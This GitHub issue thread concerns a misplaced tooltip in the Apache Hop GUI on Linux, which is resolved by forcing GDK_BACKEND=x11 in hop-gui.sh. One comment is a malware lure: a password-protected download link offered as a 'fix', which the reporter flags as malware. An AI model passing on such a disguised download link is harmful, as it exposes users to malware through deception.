### ISSUE TITLE
[Bug]: Incorrect tooltip position

### ISSUE THREAD

**Issue by dave-csc** [apache/hop#4252]
### Apache Hop version?

2.9.0

### Java version?

openjdk 21.0.2 2024-01-16

### Operating system

Linux

### What happened?

When hovering a hop in Hop GUI, the tooltip is shown at the top left of the window, rather than next to the hop itself, see the example below:

![Schermata del 2024-08-28 11-22-00](https://github.com/user-attachments/assets/f5889ee4-c5b7-4692-a3b5-3fef48ffbde2)

Using Ubuntu 22.04.4 on VirtualBox 7.20 in Windows 10 host, no particular graphics options enabled

### Issue Priority

Priority: 3

### Issue Component

Component: Hop Gui

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dave-csc** [comment]
BEWARE OF THE FILE ABOVE, it's a malware! (already reported to GitHub)

**Comment by dave-csc** [comment]
Update: the same issue happens after upgrading the OS to Ubuntu 24.04.1 (with the same configuration for the other tools).

**Comment by ep9io** [comment]
Setting the GDK_BACKEND environment variable to x11 within the hop-gui.sh script (see screenshot below) can help resolve compatibility issues when running HOP on Wayland by forcing GTK-based applications to use X11 rendering.

![image](https://github.com/user-attachments/assets/181ec08b-55a9-41f4-90da-823e21cd9fec)

Related issues:

- https://github.com/apache/hop/issues/4619
- https://github.com/eclipse-platform/eclipse.platform.swt/issues/639
- https://github.com/eclipse-platform/eclipse.platform.swt/issues/790

**Comment by dave-csc** [comment]
Patching the `hop-gui.sh` file indeed solves the issue, thanks @ep9io ✌️

**Comment by dave-csc** [comment]
Update: this patch also solves #3783 and #3813 ✌️ ✌️

**Comment by hansva** [comment]
fixed by #4720

**Comment by ep9io** [comment]
> GDK_BACKEND=x11

We need to have the `export` prior to the setting of the variable.  

However, good point about wrapping the env param in quotes as that's good practice to avoid word splitting and empty variable substitution.  The env param should be set correctly in most circumstances, but there's no harm with what you suggested.
